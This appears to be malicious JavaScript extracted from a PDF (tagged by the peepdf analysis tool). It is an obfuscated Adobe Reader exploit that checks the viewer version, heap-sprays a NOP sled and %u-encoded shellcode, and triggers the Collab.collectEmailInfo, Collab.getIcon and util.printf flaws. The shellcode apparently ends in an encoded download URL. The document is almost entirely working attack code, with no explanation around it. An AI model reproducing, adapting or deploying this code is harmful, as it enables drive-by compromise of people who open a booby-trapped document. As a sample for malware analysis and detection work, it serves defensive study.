// peepdf comment: Javascript code located in object 7 (version 0)

var xyutequex = false;
var wochechuc = new Array();

function hethithyq() {}
function wexyixyat() {}
var thexye;

function cazethexy(cazethexy) {
    return true;
}
this.pecuwo = 24560;

function kazuq(mochyb, fabaquochu) {
    function thith(thith) {
        return thith;
    }
    while (mochyb.length * 2 < fabaquochu) mochyb += mochyb;
    this.quynopaque = 'quynopaque';
    mochyb = mochyb.substring(0, fabaquochu / 2);

    function natoj(natoj) {
        return natoj;
    }
    return mochyb;
}
this.laxyeth = false;

function tychux(gabuz) {
    var nithochyp = false;
    var xyicedax = 0x0c0c0c0c;
    var queth = false;
    var cotuchuvuq = false;
    var xyymichan = new Array('%u4343', '%u4343', '%u434', '3%u0FEB', '%u335', 'B%u66C9', '%u80B9%', 'u8001%uE', 'F33%u', 'E243%u', 'EBFA%uE', '805%u', 'FFEC%uF', 'FFF%u', '8B7F%u', 'DF4E%u', 'EFEF%u', '64EF%uE', '3AF%u9F', '64%u42F3', '%u9F6', '4%u6EE7%', 'uEF03%', 'uEFEB', '%u64EF%u', 'B903%u6', '187%u', 'E1A1%u', '0703%uE', 'F11%uE', 'FEF%uA', 'A66%uB9E', 'B%u778', '7%u65', '11%u07E', '1%uEF1F%', 'uEFEF%', 'uAA66%u', 'B9E7%u', 'CA87%u1', '05F%u0', '72D%uEF', '0D%uEF', 'EF%uAA', '66%uB', '9E3%u008', '7%u0F', '21%u078F', '%uEF3', 'B%uEFEF', '%uAA66', '%uB9F', 'F%u2E87%', 'u0A96%u0', '757%uEF2', '9%uEFEF%', 'uAA66', '%uAFFB', '%uD76F%u', '9A2C%u', '6615%u', 'F7AA%uE', '806%uEF', 'EE%uB1', 'EF%u9A66', '%u64C', 'B%uEBA', 'A%uEE85', '%u64B', '6%uF7', 'BA%u0', '7B9%uE', 'F64%uEFE', 'F%u87', 'BF%uF5', 'D9%u9F', 'C0%u780', '7%uEFE', 'F%u66EF', '%uF3A', 'A%u2A', '64%u2', 'F6C%u6', '6BF%uCF', 'AA%u108', '7%uEFE', 'F%uBFEF%', 'uAA64', '%u85F', 'B%uB6ED', '%uBA6', '4%u07', 'F7%uEF', '8E%uE', 'FEF%uA', 'AEC%u28C', 'F%uB3EF', '%uC19', '1%u288A', '%uEBAF%', 'u8A97%', 'uEFEF%', 'u9A10', '%u64C', 'F%uE3', 'AA%uEE85', '%u64B6%u', 'F7BA%u', 'AF07%', 'uEFEF%u8', '5EF%uB7', 'E8%uAAEC', '%uDCCB%', 'uBC34%', 'u10BC%uC', 'F9A%uBC', 'BF%uAA', '64%u85F', '3%uB6EA', '%uBA6', '4%u07', 'F7%uEF', 'CC%uEFEF', '%uEF85%', 'u9A10%u', '64CF%', 'uE7AA%', 'uED85%u', '64B6%uF7', 'BA%uFF07', '%uEFEF%', 'u85EF%', 'u6410%', 'uFFAA%u', 'EE85%', 'u64B6%uF', '7BA%uEF0', '7%uEFEF', '%uAEE', 'F%uBDB', '4%u0EEC%', 'u0EEC', '%u0EEC%u', '0EEC%', 'u036C%u', 'B5EB%u64', 'BC%u0D35', '%uBD18', '%u0F10', '%u64BA', '%u640', '3%uE792%', 'uB264%u', 'B9E3%u9', 'C64%u6', '4D3%uF19', 'B%uEC97', '%uB91C', '%u9964%', 'uECCF', '%uDC1C%u', 'A626%', 'u42AE', '%u2CEC', '%uDCB9%u', 'E019%', 'uFF51', '%u1DD5%u', 'E79B%', 'u212E', '%uECE2%u', 'AF1D%u', '1E04%u1', '1D4%u9AB', '1%uB5', '0A%u0', '464%u', 'B564%uE', 'CCB%u', '8932%', 'uE364', '%u64A4%u', 'F3B5%u32', 'EC%uEB', '64%uEC64', '%uB12', 'A%u2DB', '2%uEFE7%', 'u1B07%u', '1011%uBA', '10%uA3BD', '%uA0A', '2%uEF', 'A1%u746', '8%u70', '74%u2F3', 'A%u632F%', 'u6D61%u', '7261%u', '7265%u7', '26F%u63', '61%u7065', '%u2E72', '%u6F63%u', '2F6D%u65', '77%u616', '2%u69', '6C%u657', 'A%u2F7', '2%u616C', '%u646E', '%u6E69%', 'u2F67%', 'u7865', '%u2E65%u', '6870%u3F', '70%u3', 'D78%u647', '0%u006', '6');

    function kychojop(kychojop) {
        return true;
    }
    xyythoch = xyymichan.join("");
    var quachytho = 9814;
    var thicho = 'thicho';
    var quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);

    function cytichich(cytichich) {
        return cytichich;
    }
    var xyewud = 13398;
    if (gabuz == 1) {
        this.choxye = false;
        xyicedax = 0x30303030;

        function pedip(pedip) {
            return true;
        }
        quafynuquo = eval("un" + "es" + "ca" + "pe" + "")(xyythoch);
        this.chevyfemaq = "chevyfemaq";
    } else if (gabuz == 2) {
        var xyajy = 'xyajy';
        quafynuquo = eval("une" + "sca" + "pe" + "")(xyythoch);

        function xyisupody(xyisupody) {
            return true;
        }
    }
    var cyquelejaq = false;

    function thochy() {}
    this.jogixyu = 1171;
    var quovequiva = 0x400000;
    var parethece = false;
    var rycofychum = quafynuquo.length * 2;
    this.xyycha = false;
    var fabaquochu = quovequiva - (rycofychum + 0x38);
    this.fucaquich = 'fucaquich';
    var mochyb = eval("une" + "sca" + "pe" + "")("%u909" + "0%u90" + "90" + "");

    function wecaxya(wecaxya) {
        return true;
    }
    mochyb = kazuq(mochyb, fabaquochu);

    function chequoc() {}
    var bijuja = (xyicedax - 0x400000) / quovequiva;
    this.thyque = 'thyque';
    for (var zeduxy = 0; zeduxy < bijuja; zeduxy++) wochechuc[zeduxy] = mochyb + quafynuquo;

    function quesuz(quesuz) {
        return true;
    }
}
function xyejywed() {
    var xyixyuquac = 'xyixyuquac';
    var micachy = 0;
    this.chuthoc = "chuthoc";
    var kaxyucochi = app.viewerVersion.toString();

    function quothete(quothete) {
        return true;
    }
    app.clearTimeOut(thexye);
    this.chahach = "chahach";
    if ((kaxyucochi >= 8 && kaxyucochi < 8.102) || kaxyucochi < 7.1) {
        this.quakaxyi = false;
        tychux(0);

        function xyuchonyq(xyuchonyq) {
            return true;
        }
        var requochos = unescape("%u" + "0c" + "0c" + "%u" + "0c" + "0c" + "");
        var xyimy = 21631;
        while (requochos.length < 0xaf98) requochos += requochos;
        var xyeth = false;
        eval("this")["co" + "ll" + "ab" + "St" + "or" + "e" + ""] = eval("Col" + "lab" + "")["co" + "ll" + "ec" + "tE" + "ma" + "il" + "In" + "fo" + ""]({
            subj: "dilyxyyqu",
            msg: requochos
        });
        var jequed = 'jequed';
    }
    if ((kaxyucochi >= 8.102 && kaxyucochi < 8.104) || (kaxyucochi >= 9 && kaxyucochi < 9.1) || kaxyucochi <= 7.101) {
        try {
            if (app["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["get" + "Ico" + "n" + ""]) {
                function dachi(dachi) {
                    return dachi;
                }
                tychux(2);
                this.thexyi = "thexyi";
                var dumizec = eval("un" + "es" + "ca" + "pe" + "")("%09");
                var masyxyuch = 'masyxyuch';
                this.xyychy = 'xyychy';
                while (dumizec.length < 0x4000) dumizec += dumizec;
                this.xyyxyas = 11155;
                dumizec = "N." + dumizec;

                function chiquuchib(chiquuchib) {
                    return true;
                }
                eval("ap" + "p" + "")["do" + "c" + ""]["Co" + "ll" + "ab" + ""]["ge" + "tI" + "co" + "n" + ""](dumizec);
                var thada = 'thada';
                micachy = 1;

                function xyuchocho(xyuchocho) {
                    return true;
                }
            } else micachy = 1;
        } catch (e) {
            micachy = 1;
        }
        if (micachy == 1) {
            if (kaxyucochi == 8.102 || kaxyucochi == 7.1) {
                tychux(1);
                this.dykexy = 15280;
                var tyxyecechi = 12954;
                eval("ut" + "il" + "")["pri" + "ntf" + ""]("%4" + "50" + "00" + "f" + "", "1299999999999999" + "9999888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "8888888888888888" + "88888888" + "");
            }
        }
    }
}
app.chiny = xyejywed;

function noquifyqu(noquifyqu) {
    return noquifyqu;
}
thexye = app.setTimeOut("app.chiny()", 10);

